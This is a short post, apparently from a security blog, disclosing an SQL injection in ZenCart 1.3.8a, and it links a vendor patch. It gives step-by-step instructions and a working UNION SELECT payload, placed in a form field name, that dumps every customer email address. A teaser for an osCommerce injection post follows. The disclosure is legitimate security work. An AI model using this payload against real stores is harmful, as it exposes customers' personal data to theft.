sql injection
ZenCart 1.3.8a SQL Injection
Unfortunately an sql injection vulnerability was discovered in Zencart v.1.3.8a
In order to test it please follow some simple steps:
1. go to the product listing page by clicking a category
2. save the page on your pc, open it in a text editor and modify (assuming there is a product with the id 111 or whatever….)
<input name=”products_id[111]” size=”4″ type=”text” value=”0″ />
to
<input name=”products_id[-1' union select GROUP_CONCAT(customers_email_address), 2 from customers/*] ” size=”4″ type=”text” value=”0″ />
3. submit the form by adding at least one product to cart for the modified input box.
The result will be that a comma separated list of all customer emails will be shown.
In order to protect against this attack you can apply the following security patch:
http://www.zen-cart.com/forum/showthread.php?p=604473
Oscommerce Sql Injection
WARNING: Do not use any kind of information found here to harm websites, business, people lives etc…
The unauthorized usage of the aforementioned methods could lead to legal prosecution and severe penalties.
Ever wanted to check how an sql injection might work with an oscommerce store?
› Continue reading